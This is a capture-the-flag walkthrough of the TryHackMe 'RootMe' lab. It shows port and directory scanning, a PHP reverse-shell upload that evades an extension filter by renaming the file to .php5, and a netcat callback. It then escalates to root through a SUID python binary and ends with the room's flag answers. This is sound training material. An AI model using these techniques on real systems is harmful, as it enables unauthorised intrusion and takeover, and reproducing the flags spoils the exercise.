RootMe

RootMeTryHackMe

Task 1: Deploy the machine

Deploy the machine

No answer needed

Task 2: Reconnaissance

Scan the machine, how many ports are open?

• Let's run a nmap scan to see which ports are open.

$ nmap -sC -sV 10.10.216.90
Starting Nmap 7.92 ( https://nmap.org ) at 2023-11-12 19:05 IST
Nmap scan report for 10.10.216.90
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.85 seconds

• There are two open ports:

Port	Service
22	ssh
80	http

Answer

2

What version of Apache is running?

Answer

2.4.29

What service is running on port 22?

Answer

SSH

Find directories on the web server using the GoBuster tool.

• We can find directories with the following command:

$ gobuster dir -u http://10.10.216.90 -w /usr/share/wordlists/dirb/small.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.216.90
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 310] [--> http://10.10.216.90/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.216.90/js/]
/panel                (Status: 301) [Size: 312] [--> http://10.10.216.90/panel/]
/uploads              (Status: 301) [Size: 314] [--> http://10.10.216.90/uploads/]
Progress: 959 / 960 (99.90%)
===============================================================
Finished
===============================================================

No answer needed

What is the hidden directory?

Answer

/panel/

Task 3: Getting a shell

user.txt

• In order to get a reverse shell, we have to first go to the /panel directory.

• There are multiple ways of obtaining a reverse shell. We will be using a php reverse shell.

• We will be using the /usr/share/webshells/php/php-reverse-shell.php script after making some modifications.

• We have to replace the IP address with our own IP address which we can find using the ip command. We can also change the port to any particular port we want like 9999.

$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:9f:ce:18 brd ff:ff:ff:ff:ff:ff
    inet 10.0.4.6/24 brd 10.0.4.255 scope global dynamic noprefixroute eth0
       valid_lft 332sec preferred_lft 332sec
    inet6 fe80::a00:27ff:fe9f:ce18/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 10.17.48.138/17 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::691d:5bb7:720:68ac/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

• Once we have replaced the IP address we are ready to upload our php-reverse-shell.php file.

• Let's click on the Upload button next.

• Looks like php is not allowed.

• There is a workaround for this, we can try to change the file extension to php5 to see if that is allowed.

• Let's hit Upload.

• Our file upload has been successful.

• We can now use netcat to listen for requests.

$ nc -nlvp 9999

• Next, let's go to the /uploads folder.

• On clicking on the php-reverse-shell.php5 link, a request will be sent to our IP address on the 9999 port which will be caught by our netcat listener.

$ nc -nlvp 9999                                  
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.216.90] 44132
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 14:26:08 up 54 min,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

• We have our reverse shell.

• Let's find the user.txt file using the find command.

$ find / -name user.txt 2>/dev/null  
/var/www/user.txt

• Now we simply have to cat the file.

$ cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}

Answer

THM{y0u_g0t_a_sh3ll}

Task 4: Privilege escalation

Search for files with SUID permission, which file is weird?

• Again, we can use the find command to find the relevant file.

$ find / -perm -u=s 2>/dev/null  
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount

• Out of all the binaries with the SUID bit set, the /usr/bin/python binary is the most unusual.

Answer

/usr/bin/python

Find a form to escalate your privileges.

• We will be using the python utility to escalate our privilege since it already has the SUID bit set.

• But before we do that, we need to check out GTFObins for a shell script.

• We have to use the selected script with the /usr/bin/python interpreter.

$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
root

• We have successfully escalated our privilege to root.

No answer needed

root.txt

• Let's find the root.txt file.

find / -name root.txt 2>/dev/null 
/root/root.txt

• All we have to do now is cat the file.

cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}

Answer

THM{pr1v1l3g3_3sc4l4t10n}